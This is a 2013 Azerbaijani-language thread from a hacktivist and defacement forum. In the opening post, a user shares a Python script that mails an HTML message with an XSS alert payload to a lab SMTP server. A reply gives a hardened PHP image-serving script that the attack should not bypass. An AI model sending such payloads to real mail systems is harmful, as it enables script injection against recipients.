Anti-armenia.ORG - Forumlar - XSS Vulnerability



Istifadəçi
    2013-03-02 22:06 GMT                 

TheLock



Gold
Mesaj Sayı : 412
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   18  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Kod:
import smtplib
email_addr = 'user@hack.local'
email = 'From: %s\n' % email_addr
email += 'To: %s\n' % email_addr
email += 'Subject: XSS\n'
email += 'Content-type: text/html\n\n'
email += '<script>alert("XSS")</script>'
s = smtplib.SMTP('192.168.58.140', 25)
s.login(email_addr, "user")
s.sendmail(email_addr, email_addr, email)
s.quit()

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2013-03-02 22:57 GMT                 

Ferid23



Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Gözəl mövzuya toxunmusan əllərinə sağlıq

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
    

Istifadəçi
    2013-03-03 10:52 GMT                 

TheLock



Gold
Mesaj Sayı : 412
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   18  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər bro.

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2013-03-03 13:07 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


profile.php-ni də versəydin gözəl olardı oturub fixinə baxardıq yaxud baxardıq vuln nəyin hesabına yaranıb orda.

Bu tipli skriptə qarşı keçməməlidir:
İstəyən yoxlaya bilər.

http://pastebin.com/fW63pKax

Kod:
<?php
error_reporting(0);

/**

CODED BY AKASTEP
IMAGES  constanti      sekillerin saxlandigi direktoriyadir.Default images direktoriyasi
Qebul edilen fayl tipleri: jpg,png,gif
In ex:
/script.php?img=1.jpg

*/

if(!defined('IMAGES')) define('IMAGES','images');
if(!defined('IMAGESDIR')) define('IMAGESDIR',str_ireplace('\\','/',substr(realpath(__FILE__),0,strrpos(realpath(__FILE__),'/')+1) . IMAGES . '/'));
if(!@file_exists(IMAGESDIR))  die('XAHIS OLUNUR sekillerin saxlandigi direktoriyani yaradin!');

//echo IMAGESDIR;exit;

//echo IMAGESDIR;
if(isset($_GET['img']) && is_string($_GET['img']) && !empty($_GET['img']) && preg_match('/^[a-zA-Z0-9\.]*$/i',(string)$_GET['img']))
{
$file=IMAGESDIR . basename(htmlspecialchars((string)$_GET['img']));
(!file_exists($file) || !is_readable($file)) ? die('Bele Sekil yoxdur!/Yaxud Fayli Oxuya bilmirem!') : '';

if((int)substr_count($file,'.')!==1){ die('Illegal Fayl Tipi!'); }
$exten=strtolower(substr($file,strrpos($file,'.')+1));/*echo $exten;*/
//$exten=substr($file,strrpos($file,'.')+1);//


!is_string($exten) ? die('Get yas desmalla sillele!') : '';

/*
mime type siyahisi:
http://www.webmaster-toolkit.com/mime-types.shtml
*/

switch($exten)
{

case 'jpg': $mime='image/jpeg';break;
case 'gif': $mime='image/gif';break;
case 'png': $mime='image/png';break;
default:die('Illegal operasiya! Fuck off!');
}

        header ('Content-Type:' . $mime . '; name="' . basename($file) .'"');
        header ('Content-Length: ' . filesize($file));
        header ('Content-Disposition: inline; filename="'  . basename($file) . '"');
        @readfile($file);



}
else
{

    die('Parameter img= menimsedilmeyib/yaxud bowdur/yaxud input sehvdir!');
}
?>

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2013-03-03 13:29 GMT                 

TheLock



Gold
Mesaj Sayı : 412
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   18  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Xəbərdar etdiyin üçün çoxsağol.Əlbəttə bro hər skriptdə işləmir.

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG